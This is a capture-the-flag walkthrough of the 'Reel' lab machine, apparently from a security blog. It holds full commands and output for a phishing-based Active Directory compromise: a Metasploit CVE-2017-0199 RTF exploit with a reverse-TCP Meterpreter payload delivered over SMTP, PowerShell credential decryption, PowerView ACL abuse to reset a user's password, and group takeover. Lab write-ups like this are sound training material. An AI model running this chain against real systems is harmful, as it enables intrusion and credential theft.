The Reel machine has been created by egre55. This is an hard Windows Machine with a strong focus on Active Directory exploitation. This box was fun, it was nice to finally have a phishing part as well as a small DACL abuse attack chain.
If you didn’t solve this challenge and just look for answers, first you should take a look at this mind map from Orange Cyberdefense and try again. It could give you some hints for attack paths when dealing with an Active Directory.
Note: All the actions performed against the target machine have been done with a standard Kali Linux machine. You can download Kali from the official website here.
In a penetration test or red team, reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.
This information can then be leveraged by an adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute initial access, to scope and prioritize post-compromise objectives, or to drive and lead further reconnaissance efforts. Here, our only piece of information is an IP address.
Scan with Nmap
Let’s start with a classic service scan with Nmap in order to reveal some of the ports open on the machine.
$ nmap -sV -Pn 10.129.147.8 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-11 11:18 EST Nmap scan report for 10.129.147.8 Host is up (0.020s latency). Not shown: 992 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 22/tcp open ssh OpenSSH 7.6 (protocol 2.0) 25/tcp open smtp 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB) 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49159/tcp open unknown Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 171.76 seconds
We have a few interesting ports, including SSH (TCP/22), FTP (TCP/21) and SMTP (TCP/25). Let’s dig a bit more.
After playing around with Nmap scripts, we found an anonymous FTP access.
$ nmap -p 21 --script=ftp-anon -Pn 10.129.147.8 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-04 09:43 EDT Nmap scan report for 10.129.147.8 Host is up (0.015s latency). PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_05-29-18 12:19AM <DIR> documents Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
Here, it seems that we have an anonymous access to the FTP server. An anonymous account accepts any string as a password and has limited access rights to an FTP server, but enough to be able to retrieve content.
$ ftp 10.129.147.8 Connected to 10.129.147.8. 220 Microsoft FTP Service Name (10.129.147.8:ax): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||41000|) 125 Data connection already open; Transfer starting. 05-28-18 11:19PM <DIR> documents 226 Transfer complete. ftp> cd documents 250 CWD command successful. ftp> dir 229 Entering Extended Passive Mode (|||41001|) 125 Data connection already open; Transfer starting. 05-28-18 11:19PM 2047 AppLocker.docx 05-28-18 01:01PM 124 readme.txt 10-31-17 09:13PM 14581 Windows Event Forwarding.docx 226 Transfer complete. ftp>
Here, we found a bunch of documents on the FTP. Let’s start with the readme.txt file.
$ cat readme.txt please email me any rtf format procedures - I'll review and convert. new format / converted documents will be saved here.
It talks about sending RTF documents via email. In our context, it could make sense given the machine has its SMTP (TCP/25) port open. So we will probably need to send an email at some point.
Now, let’s check AppLocker.docx. It contains the following text:
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
It seems the target computer have some AppLocker rules in place, we may need to use a specific bypass later.
For the last document, WindowsEventForwarding.docx, we didn’t find anything interesting in it. However, using exiftool, a metadata reader, we were able to extract an email address.
$ exiftool WindowsEventForwarding.docx ExifTool Version Number : 12.39 File Name : WindowsEventForwarding.docx Directory : . File Size : 14 KiB ...[snipe]... Zip File Name : [Content_Types].xml Creator : email@example.com Revision Number : 4 Create Date : 2017:10:31 18:42:00Z Modify Date : 2017:10:31 18:51:00Z Template : Normal.dotm Total Edit Time : 5 minutes Pages : 2 Words : 299
Here, it seems that our initial foothold will involve a phishing email that is able to bypass some AppLocker rules.
According to the MITRE, adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems.
As we need to send an RTF file, it seemed pretty obvious to start with the CVE-2017-0199 exploit, named office_word_hta in Metasploit. This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution.
Let’s configure this module with Metasploit.
msf6 exploit(windows/fileformat/office_word_hta) > show options Module options (exploit/windows/fileformat/office_word_hta): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME hello.rtf yes The file name. SRVHOST 10.10.14.20 yes The local host or network interface to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH default.hta yes The URI to use for the HTA file Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Microsoft Office Word
Now, we just need to enter the
exploit command to generate the malicious file and start the listener.
msf6 exploit(windows/fileformat/office_word_hta) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.10.14.xx:443 [+] hello.rtf stored at /root/.msf4/local/hello.rtf [*] Using URL: http://10.10.14.xx:8080/default.hta [*] Server started.
Note that our malicious file is stored in /root/.msf4/local/hello.rtf. Now, using swaks, an SMTP test tool, we can send our payload to firstname.lastname@example.org.
$ sudo swaks --to email@example.com --server 10.129.147.8 --attach /root/.msf4/local/hello.rtf [sudo] password for ax: *** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the future. Prefix filenames with '@' instead. === Trying 10.129.147.8:25... === Connected to 10.129.147.8. <- 220 Mail Service ready -> EHLO nms <- 250-REEL <- 250-SIZE 20480000 <- 250-AUTH LOGIN PLAIN <- 250 HELP -> MAIL FROM:<root@nms> <- 250 OK -> RCPT TO:<firstname.lastname@example.org> <- 250 OK -> DATA <- 354 OK, send. -> Date: Fri, 11 Feb 2022 13:17:58 -0500 -> To: email@example.com -> From: root@nms -> Subject: test Fri, 11 Feb 2022 13:17:58 -0500 ...[snip]... -> -> . <- 250 Queued (12.109 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host.
After waiting a few seconds, we should get a remote shell on the target machine.
msf6 exploit(windows/fileformat/office_word_hta) > [*] Sending stage (175174 bytes) to 10.129.147.8 [*] Meterpreter session 1 opened (10.10.14.20:443 -> 10.129.147.8:49509) at 2022-06-04 10:20:04 -0400 msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : REEL OS : Windows 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : en_GB Domain : HTB Logged On Users : 6 Meterpreter : x86/windows
Nice, we now have a remote shell and our first flag.
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.
Looking around nico’s Desktop folder, we found a file named cred.xml.
meterpreter > ls C:\\Users\\nico\\Desktop Listing: C:\Users\nico\Desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100444/r--r--r-- 1468 fil 2017-10-27 19:59:16 -0400 cred.xml 100666/rw-rw-rw- 282 fil 2017-10-27 18:42:45 -0400 desktop.ini 100444/r--r--r-- 32 fil 2017-10-27 19:40:33 -0400 user.txt 100666/rw-rw-rw- 162 fil 2017-10-27 17:34:38 -0400 ~$iledDeliveryNotification.doc
The file contains a PSCredential object with an encrypted password for Tom.
<Objs Version="184.108.40.206" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">HTB\Tom</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS> </Props> </Obj> </Objs>
Thanks to PowerShell we can easily retrieve the cleartext password.
meterpreter > load powershell Loading extension powershell...Success. meterpreter > powershell_shell PS > $credential = Import-CliXml -Path c:\users\nico\desktop\cred.xml PS > $credential.GetNetworkCredential().Password 1ts-mag1c!!! PS >
We didn’t get any access using WinRM/SMB with these credentials, however, the remote machine does have an SSH (TCP/22) server running.
$ ssh firstname.lastname@example.org email@example.com's password: Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. tom@REEL C:\Users\tom>
Nice, we have access to the remote machine through SSH.
Digging through Tom’s folders, we found some files related to BloodHound, including the result of a previous scan.
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>dir Volume in drive C has no label. Volume Serial Number is CC8A-33E1 Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors 05/29/2018 07:57 PM <DIR> . 05/29/2018 07:57 PM <DIR> .. 11/16/2017 11:50 PM 112,225 acls.csv 10/28/2017 08:50 PM 3,549 BloodHound.bin 10/24/2017 03:27 PM 246,489 BloodHound_Old.ps1 10/24/2017 03:27 PM 568,832 SharpHound.exe 10/24/2017 03:27 PM 636,959 SharpHound.ps1 5 File(s) 1,568,054 bytes 2 Dir(s) 15,741,628,416 bytes free
The acls.csv file contains ACL related to the domain. We can easily grep some interesting data manually with PowerShell. Let’s start with tom
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>powershell PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Get-Content .\acls.csv | Select-String -Pattern tom ...[snip]... "claire@HTB.LOCAL","USER","","tom@HTB.LOCAL","USER","WriteOwner","","AccessAllowed","False"
Here we can see that, tom has the WriteOwner permission over claire which means we can change the object owner to take over the object. Basically, we own claire. Let’s see what this user can do.
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Get-Content .\acls.csv | Select-String -Pattern claire ...[snip]... "Backup_Admins@HTB.LOCAL","GROUP","","claire@HTB.LOCAL","USER","WriteDacl","","AccessAllowed","False"
That’s really interesting, claire has WriteDacl privileges over Backup_Admins which means we could modify object’s ACEs and take over Backup_Admins. For now, we don’t really know what Backup_Admins can do, but we will see when we get there.
Let’s abuse the WriteOwner permission tom has over claire. Here, we used the PowerView.ps1 PowerShell script that was already present on the machine. As a reminder, PowerView is a tool that helps to gain network situational awareness on Windows domains, but it also has some interesting functionality.
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> cd .. PS C:\Users\tom\Desktop\AD Audit\BloodHound> dir Directory: C:\Users\tom\Desktop\AD Audit\BloodHound Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 5/29/2018 8:57 PM Ingestors -a--- 10/30/2017 10:15 PM 769587 PowerView.ps1
Here, the PowerView.ps1 module is imported in our PowerShell session. Using Set-DomainObjectOwner we can modify the owner of claire and set it to tom. Given we have full control over claire, we can use the Add-DomainObjectAc command to allow tom to reset claire’s password.
Finally, we can use the Set-DomainUserPassword command to modify claire’s password.
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Import-Module .\PowerView.ps1 PS C:\Users\tom\Desktop\AD Audit\BloodHound> Set-DomainObjectOwner -Identity claire -OwnerIdentity tom PS C:\Users\tom\Desktop\AD Audit\BloodHound> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword PS C:\Users\tom\Desktop\AD Audit\BloodHound> $creds = ConvertTo-SecureString 'Qwerty123!' -AsPlainText -Force PS C:\Users\tom\Desktop\AD Audit\BloodHound> Set-DomainUserPassword -identity claire -accountpassword $creds -Verbose VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'claire' VERBOSE: [Set-DomainUserPassword] Password for user 'claire' successfully reset
Let’s sse if we can get an SSH access with claire domain account.
$ ssh firstname.lastname@example.org email@example.com's password: Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. claire@REEL C:\Users\claire>
Yep ! Now, since claire has WriteDacl privileges over Backup_Admins, we can add our account to this group.
claire@REEL C:\Users\claire>net group backup_admins claire /add The command completed successfully. claire@REEL C:\Users\claire> net group backup_admins Group name Backup_Admins Comment Members ------------------------------------------------------------------------------- claire ranj The command completed successfully.
Done and done.
Getting the admin password
After some unsuccessful escalation paths, we found something interesting. Being a member of the Backup_Admins group give us full (F) access over the C:\Users\Administrator folder.
Note that we used the icacls command to display discretionary access control lists (DACLs) on the specified folder.
claire@REEL C:\Users>icacls Administrator Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F) HTB\Backup_Admins:(OI)(CI)(F) HTB\Administrator:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) Successfully processed 1 files; Failed processing 0 files
Cool, we should be able to read the root.txt file.
claire@REEL c:\Users\Administrator\Desktop>type root.txt Access is denied.
Or not. We may be missing some privileges… However, we have access to another folder, Backup Scripts.
claire@REEL c:\Users\Administrator\Desktop>cd "Backup Scripts" claire@REEL c:\Users\Administrator\Desktop\Backup Scripts>dir Volume in drive C has no label. Volume Serial Number is CC8A-33E1 Directory of c:\Users\Administrator\Desktop\Backup Scripts 11/02/2017 09:47 PM <DIR> . 11/02/2017 09:47 PM <DIR> .. 11/03/2017 11:22 PM 845 backup.ps1 11/02/2017 09:37 PM 462 backup1.ps1 11/03/2017 11:21 PM 5,642 BackupScript.ps1 11/02/2017 09:43 PM 2,791 BackupScript.zip 11/03/2017 11:22 PM 1,855 folders-system-state.txt 11/03/2017 11:22 PM 308 test2.ps1.txt 6 File(s) 11,903 bytes 2 Dir(s) 15,738,982,400 bytes free
The folder contains multiple scripts and one of them had interesting information in it.
claire@REEL c:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1 # admin password $password="Cr4ckMeIfYouC4n!" #Variables, only Change here $Destination="\\BACKUP03\BACKUP" #Copy the Files to this Location
Let’s see if this password works with the administrator account.
$ ssh firstname.lastname@example.org email@example.com's password: Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. administrator@REEL C:\Users\Administrator> administrator@REEL C:\Users\Administrator\Desktop>ls 'ls' is not recognized as an internal or external command, operable program or batch file. administrator@REEL C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is CC8A-33E1 Directory of C:\Users\Administrator\Desktop 21/01/2018 14:56 <DIR> . 21/01/2018 14:56 <DIR> .. 02/11/2017 21:47 <DIR> Backup Scripts 28/10/2017 11:56 32 root.txt 1 File(s) 32 bytes 3 Dir(s) 15,738,458,112 bytes free
We now have access to the second flag.
Awesome ! I hope you enjoyed it, I know I did :)